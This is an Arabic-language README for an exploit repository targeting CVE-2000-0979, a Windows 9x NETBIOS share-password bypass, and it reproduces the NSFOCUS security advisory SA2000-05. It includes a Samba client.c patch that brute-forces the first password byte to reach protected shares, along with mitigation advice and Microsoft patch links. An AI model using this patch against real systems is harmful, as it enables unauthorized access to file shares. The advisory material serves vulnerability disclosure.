
CVE-2000-0979
CVE-2000-0979.rb هي الأداة المستقلة لاستغلال CVE-2000-0979 ضد خدمة SMB في ويندوز 95.
msf_2000_0979.rb هو وحدة Metasploit. يمكنك نسخ هذا إلى metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb

المزيد من الوثائق قريبًا!
استشارة أمنية من NSFOCUS (SA2000-05)
الموضوع: ثغرة في التحقق من كلمة مرور NETBIOS في ويندوز 9x من مايكروسوفت
تاريخ الإصدار: 24 أغسطس 2000 تاريخ التحديث: 11 أكتوبر 2000
توجد ثغرة في مخطط التحقق من كلمة المرور المستخدم في تنفيذ بروتوكول NETBIOS في ويندوز 9x من مايكروسوفت. تسمح هذه الثغرة لأي مستخدم بالوصول إلى خدمة مشاركة الملفات المحمية بكلمة مرور في ويندوز 9x. لا يحتاج المهاجم إلى معرفة كلمة مرور المشاركة.
يمكنك تعيين كلمة مرور لحماية الموارد المشتركة في نظام ويندوز 9x من مايكروسوفت. لكن توجد ثغرة في مخطط التحقق من كلمة المرور المستخدم في تنفيذ بروتوكول NETBIOS في ويندوز 9x من مايكروسوفت. للتحقق من كلمة المرور، يعتمد طول كلمة المرور على طول البيانات المرسلة من العميل إلى الخادم. أي، إذا قام العميل بتعيين طول كلمة المرور إلى بايت واحد وأرسل الحزمة مع كلمة المرور بنص عادي إلى الخادم، فسيقارنها الخادم فقط بالبايت الأول من كلمة المرور المشتركة (نص عادي)، وإذا تطابقت، تكتمل عملية التحقق. كل ما يحتاجه المهاجم هو تخمين ومحاولة البايت الأول من كلمة المرور في الضحية. نظام الإدارة عن بُعد في ويندوز 9x متأثر أيضًا لأنه يستخدم نفس طريقة التحقق من كلمة مرور المشاركة.
هذا مثال بسيط لتوضيح هذه الثغرة. احصل على حزمة samba المصدرية وقم بتعديل source/client/client.c كالتالي:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
أغلق خدمة مشاركة الملفات والطابعات في Microsoft.
تم إبلاغ Microsoft وأصدرت نشرة أمنية واحدة بخصوص هذا الخلل.
النشرة متاحة على:
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
التصحيحات متاحة على:
. Microsoft Windows 95
التصحيح متاح قريبًا
. Microsoft Windows 98 و 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
المعلومات المقدمة تُنشر من قبل NSFOCUS "كما هي" دون أي ضمان من أي نوع. تخلو NSFOCUS من جميع الضمانات، سواء كانت صريحة أو ضمنية، باستثناء ضمانات القابلية للتسويق. لا تتحمل NSFOCUS تحت أي ظرف من الظروف المسؤولية عن أي أضرار مهما كانت بما في ذلك الأضرار المباشرة، غير المباشرة، العرضية، التبعية، فقدان أرباح الأعمال أو الأضرار الخاصة، حتى لو تم إبلاغ NSFOCUS بإمكانية حدوث مثل هذه الأضرار. يُسمح بتوزيع أو إعادة إنتاج المعلومات بشرط عدم تعديل الاستشارة بأي شكل من الأشكال.
?Copyright 1999-2000 NSFOCUS. جميع الحقوق محفوظة. شروط الاستخدام.
فريق الأمن NSFOCUS [email protected] شركة NSFOCUS لتكنولوجيا المعلومات المحدودة (http://www.nsfocus.com)